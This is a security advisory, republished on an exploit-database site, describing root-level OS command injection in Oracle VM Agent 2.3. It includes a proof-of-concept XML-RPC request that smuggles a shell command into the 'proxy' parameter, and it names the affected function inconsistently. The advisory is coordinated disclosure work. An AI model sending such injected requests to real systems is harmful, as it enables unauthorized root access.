0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Oracle Virtual Server Agent Command Injection
============================================= Oracle Virtual Server Agent Command Injection ============================================= 1. Advisory Information Advisory ID: BONSAI-2010-0109 Date published: 2010-10-13 Vendors contacted: Oracle Release mode: Coordinated release 2. Vulnerability Information Class: Injection Remotely Exploitable: Yes Locally Exploitable: Yes 3. Software Description Oracle VM is server virtualization software which fully supports both Oracle and non-Oracle applications. Oracle VM offers scalable, low-cost server virtualization that is three times more efficient than existing server virtualization products from other vendors. Oracle has also announced certification of key Oracle products including Oracle Database, Oracle Fusion Middleware, Oracle Applications, and Oracle Real Application Clusters with Oracle VM. Oracle VM Manager communicates with Oracle VM Agent to create and manage guests on an Oracle VM Server. Oracle VM Agent is installed and configured during the installation of Oracle VM Server. By default, Oracle VM Agent is executed, with a highly privileged user, typically root. 4. Vulnerability Description Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data. 5. Vulnerable packages We ran our tests using Oracle Virtual Server release 2.2.0 with Oracle VM Agent 2.3. 6. Non-vulnerable packages Patch set 2.2.1 and above 7. Credits This vulnerability was discovered by Nahuel Grisolia ( nahuel -at- bonsai-sec.com ). 8. Technical Description 8.1. OS Command Injection CVSSv2 Score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C) Oracle VS Agent is prone to a remote command execution vulnerability because the software fails to adequately sanitize user-supplied input. Oracle VS Agent exposes through XML-RPC several functions. One of these functions is validate_master_ip, which receives four parameters. The second parameter "proxy", is vulnerable to command injection, because it is not properly sanitized and its content is concatenated in an operative system command, executed as a highly privileged user (typically root). The following POST message can be sent to the VM Agent XML-RPC port. By doing this, the ping command is executed as follows: POST /RPC2 HTTP/1.0 User-Agent: XML-RPC for PHP 3.0.0.beta authorization: Basic XXXXXXXXXXXXXXX Host: XXX.XXX.XXX.XXX:8899 Accept-Encoding: gzip, deflate Accept-Charset: UTF-8,ISO-8859-1,US-ASCII Content-Type: text/xml Content-Length: 416 <?xml version="1.0"?> <methodCall> <methodName>utl_test_url</methodName> <params> <param> <value><string>http://192.168.1.101</string></value> </param> <param> <value><string>192.168.1.103'; ping –c 10 localhost; '</string></value> </param> <param> <value><string>192.168.1.101</string></value> </param> <param> <value><string>192.168.1.101</string></value> </param> </params> </methodCall> 9. Report Timeline 2010-09-24 / Bonsai provides vulnerability information to ORACLE 2010-09-29 / Oracle confirms the vulnerability 2010-10-12 / Oracle published Critical Patch Update Fix 2010-10-13 / Public Disclosure # 0day.today [2024-09-28] #